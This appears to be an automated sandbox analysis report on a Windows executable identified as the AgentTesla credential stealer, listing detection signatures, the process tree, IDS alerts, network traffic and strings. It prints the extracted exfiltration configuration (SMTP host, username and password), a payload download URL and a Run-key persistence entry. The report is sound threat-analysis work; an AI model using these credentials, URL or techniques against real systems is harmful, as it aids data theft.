Windows Analysis Report
Ref#0503711.exe

Overview

General Information

Sample name: Ref#0503711.exe
Analysis ID: 1528272
MD5: 3b2e54913c8b29ce886c8b36f8dd0cfc
SHA1: ff514c4f55dc70f5d1914fcf7118f24fd636e8a2
SHA256: 405832c40918da8ad82482319361d443a19cb05d8834e0258e5c54bf11faae84
Tags: booking, exe, SPAM-ITA, user-JAMESWT_MHT

Detection

AgentTesla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ref#0503711.exe (PID: 7332 cmdline: "C:\Users\user\Desktop\Ref#0503711.exe" MD5: 3B2E54913C8B29CE886C8B36F8DD0CFC)
    • docdd.exe (PID: 7392 cmdline: "C:\Users\user\AppData\Local\Temp\docdd.exe" MD5: DBD0E17845DA07384D942B76268CF5B7)
      • tmp2083.tmp.exe (PID: 7652 cmdline: "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe" MD5: 1590A3EFB4A143305E7182FBD284A414)
        • tmp2083.tmp.exe (PID: 7692 cmdline: "C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe" MD5: 1590A3EFB4A143305E7182FBD284A414)
          • WerFault.exe (PID: 7812 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 996 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • Ref#0503711.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\Ref#0503711.exe" MD5: 3B2E54913C8B29CE886C8B36F8DD0CFC)
  • cleanup
Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |

Source | Rule | Description | Author | Strings
00000002.00000002.2919838157.0000000002F47000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
(21 more entries not shown)

Source | Rule | Description | Author | Strings
2.2.Ref#0503711.exe.400000.0.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
2.2.Ref#0503711.exe.400000.0.unpack | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security |
2.2.Ref#0503711.exe.400000.0.unpack | INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen | Strings:
  • 0x3347b:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
  • 0x334ed:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
  • 0x33577:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
  • 0x33609:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
  • 0x33673:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
  • 0x336e5:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
  • 0x3377b:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
  • 0x3380b:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.Ref#0503711.exe.5fa0000.11.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
3.2.tmp2083.tmp.exe.5ba0000.7.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
(13 more entries not shown)

                      System Summary

                      Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Roaming\ioibrzb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\Ref#0503711.exe, ProcessId: 7332, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ioibrzb
                      Source: Network Connection | Author: frack113 | Data: DestinationIp: 162.254.34.31, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\Ref#0503711.exe, Initiated: true, ProcessId: 7416, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49733
                      Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                      2024-10-07T18:07:33.489717+0200 | 2030171 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 162.254.34.31 | 587 | TCP
                      2024-10-07T18:05:56.019610+0200 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 162.254.34.31 | 587 | TCP
                      2024-10-07T18:05:56.019610+0200 | 2855245 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 162.254.34.31 | 587 | TCP
                      2024-10-07T18:07:33.489717+0200 | 2840032 | 1 | A Network Trojan was detected | 192.168.2.4 | 49733 | 162.254.34.31 | 587 | TCP

                      AV Detection

                      Source: 2.2.Ref#0503711.exe.400000.0.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "162.254.34.31", "Username": "sendxambro@educt.shop", "Password": "ABwuRZS5Mjh5"}
                      Source: Ref#0503711.exe | ReversingLabs: Detection: 31%
                      Source: Submited Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\Temp\docdd.exe | Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\ioibrzb.exe | Joe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe | Joe Sandbox ML: detected
                      Source: Ref#0503711.exe | Joe Sandbox ML: detected
                      Source: Ref#0503711.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: unknown | HTTPS traffic detected: 104.21.56.249:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
                      Source: Ref#0503711.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: mscorlib.pdb# source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: Qytqeye.pdb source: tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004632000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004231000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2941035784.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: %%.pdb source: tmp2083.tmp.exe, 00000004.00000002.2914577313.0000000001339000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbTe source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\tmp2083.tmp.PDB source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000171A000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#0503711.exe, 00000000.00000002.1724582312.0000000006190000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.000000000313B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb4ssMm2 source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.pdbj source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#0503711.exe, 00000000.00000002.1724582312.0000000006190000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.000000000313B000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.pdbsP source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000169E000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Qytqeye.pdbH source: tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004632000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2921167455.0000000004231000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000004.00000002.2941035784.0000000005AC0000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbM source: tmp2083.tmp.exe, 00000004.00000002.2915585701.00000000016CF000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2915585701.0000000001638000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: m0C:\Windows\mscorlib.pdb source: tmp2083.tmp.exe, 00000004.00000002.2914577313.0000000001339000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb]p source: tmp2083.tmp.exe, 00000004.00000002.2915585701.000000000171A000.00000004.00000020.00020000.00000000.sdmp

                      Networking

                      Source: Network trafficSuricata IDS: 2855245 - Severity 1 - ETPRO MALWARE Agent Tesla Exfil via SMTP : 192.168.2.4:49733 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49733 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2030171 - Severity 1 - ET MALWARE AgentTesla Exfil Via SMTP : 192.168.2.4:49733 -> 162.254.34.31:587
                      Source: Network trafficSuricata IDS: 2840032 - Severity 1 - ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 : 192.168.2.4:49733 -> 162.254.34.31:587
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.4acd860.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#0503711.exe.48eac18.2.raw.unpack, type: UNPACKEDPE
                      Source: global trafficTCP traffic: 192.168.2.4:49733 -> 162.254.34.31:587
                      Source: global trafficHTTP traffic detected: GET /d/4wmb3QgRfXU5M4s2/bHzsEUNaVOT3WXU2lPvPRcIphVFu9mJr HTTP/1.1Host: tempfiles.ninjaConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 162.254.34.31 162.254.34.31
                      Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                      Source: Joe Sandbox ViewASN Name: VIVIDHOSTINGUS VIVIDHOSTINGUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: unknownDNS query: name: api.ipify.org
                      Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                      Source: unknownTCP traffic detected without corresponding DNS query: 162.254.34.31
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: tempfiles.ninja
                      Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                      Source: tmp2083.tmp.exe.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0=
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://ocsp.digicert.com0A
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://ocsp.digicert.com0C
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://ocsp.digicert.com0X
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp, docdd.exe, 00000001.00000002.1728738734.0000000002701000.00000004.00000800.00020000.00000000.sdmp, docdd.exe, 00000001.00000002.1728738734.0000000002773000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.000000000313B000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002DA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: docdd.exe, 00000001.00000002.1728738734.000000000278C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempfiles.ninja
                      Source: docdd.exe, 00000001.00000002.1728738734.000000000278C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempfiles.ninjad
                      Source: Ref#0503711.exe, ioibrzb.exe.0.dr, tmp2083.tmp.exe.1.drString found in binary or memory: http://www.digicert.com/CPS0
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2912403992.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                      Source: Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                      Source: Ref#0503711.exe, 00000002.00000002.2919838157.0000000002ED1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp, tmp2083.tmp.exe, 00000003.00000002.1751533958.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp, Ref#0503711.exe, 00000000.00000002.1706049120.00000000045EA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://stackoverflow.com/q/2152978/23354
                      Source: docdd.exe, 00000001.00000002.1728738734.0000000002701000.00000004.00000800.00020000.00000000.sdmp, docdd.exe, 00000001.00000002.1728738734.0000000002773000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tempfiles.ninja
                      Source: docdd.exe, 00000001.00000002.1728738734.0000000002701000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://tempfiles.ninja/d/4wmb3QgRfXU5M4s2/bHzsEUNaVOT3WXU2lPvPRcIphVFu9mJr
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
                      Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
                      Source: unknown HTTPS traffic detected: 104.21.56.249:443 -> 192.168.2.4:49731 version: TLS 1.2
                      Source: unknown HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2

                      System Summary

                      Source: 2.2.Ref#0503711.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#0503711.exe.4acd860.4.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#0503711.exe.49dc240.5.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: 0.2.Ref#0503711.exe.48eac18.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_060E0BC8 NtProtectVirtualMemory, 0_2_060E0BC8
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_060E2148 NtResumeThread, 0_2_060E2148
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_060E0BC0 NtProtectVirtualMemory, 0_2_060E0BC0
                      Source: C:\Users\user\Desktop\Ref#0503711.exe Code function: 0_2_060E2140 NtResumeThread, 0_2_060E2140
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Code function: 3_2_05B30708 NtProtectVirtualMemory, 3_2_05B30708
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Code function: 3_2_05B31BB8 NtResumeThread, 3_2_05B31BB8
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Code function: 3_2_05B30700 NtProtectVirtualMemory, 3_2_05B30700
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Code function: 3_2_05B31BB0 NtResumeThread, 3_2_05B31BB0
                      Source: C:\Users\user\AppData\Local\Temp\tmp2083.tmp.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 996
                      Source: Ref#0503711.exe Static PE information: invalid certificate
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.0000000003411000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1724582312.0000000006190000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.000000000377B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedocdd.exe" vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004418000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.000000000379F000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.0000000004701000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1691296366.0000000003850000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000000.1665928636.0000000000F52000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamedoc5.exeF vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1712847578.0000000005D30000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameStgbmdbok.dll" vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameStgbmdbok.dll" vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenamedoc5.exeF vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1706049120.00000000047F9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename6623bc4b-fa2b-443b-b079-7932cd528c3c.exe4 vs Ref#0503711.exe
                      Source: Ref#0503711.exe, 00000000.00000002.1720774712.0000000006050000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs Ref#0503711.exe
